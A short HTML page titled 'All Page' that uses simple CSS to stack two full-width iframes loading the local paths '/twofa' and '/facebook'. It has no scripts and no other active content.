<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <!-- <meta http-equiv="refresh" content="10"> -->
	<link rel="shortcut icon" href="pabel.png" type="image/x-icon" />
  <title>All Page</title>
  <style>
    *{
      padding: 0;
      margin: 0;
      font-family: Sans-Serif;
    }
    iframe{
      width: 100%;
      height: 50%;
    }
     .iframe1{
       height: 60%;
     }
  </style>
</head>
<body>
  <div class="">
    
    <iframe class="iframe1" src="/twofa" frameborder="0"></iframe>
    <iframe class="ifram2" src="/facebook" frameborder="0"></iframe>
  </div>
</body>
</html>